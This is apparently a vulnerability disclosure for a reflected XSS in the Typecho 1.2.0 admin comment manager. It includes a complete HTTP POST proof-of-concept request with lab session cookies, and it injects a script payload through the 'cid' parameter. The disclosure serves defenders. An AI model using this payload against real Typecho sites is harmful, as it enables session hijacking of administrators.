0%

Typecho V1.2.0 Backend Reflected XSS

Description

Typecho admin backend Comment Manager /admin/manage-comments.php with reflected-XSS via unfiltered POST parameter cid.

Affected Version

Typecho <= 1.2.0

POC

  1. Login to typecho admin backend management system.
  2. In Comment Manager /admin/manage-comments.php, the unfiltered $request->cid is directly echoed to html.

The full POC request:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&__typecho_all_posts=off&uid= HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 745020ecd4b17dde48d43755702a78b4__typecho_uid=1; 745020ecd4b17dde48d43755702a78b4__typecho_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD_2132_saltkey=ql9191Ym; u5DD_2132_lastvisit=1677486351; u5DD_2132_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD_2132_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD_2132_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD_2132_lastcheckfeed=1%7C1677489964; u5DD_2132_nofavfid=1; u5DD_2132_home_diymode=1; u5DD_2132_visitedfid=2; u5DD_2132_smile=1D1; u5DD_2132_home_readfeed=1677497943; u5DD_2132_forum_lastvisit=D_2_1677498054; u5DD_2132_st_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD_2132_editormode_e=1; u5DD_2132_st_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD_2132_viewid=tid_1; u5DD_2132_seccode=5.792e3c6d8b004d4403; u5DD_2132_seccodecSE52ETX=6.a73b7daa353701b59a
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

coid[]=1&cid="><script>alert(1)</script><!--

Reference

Reported by Srpopty, vulnerability discovered by using Corax.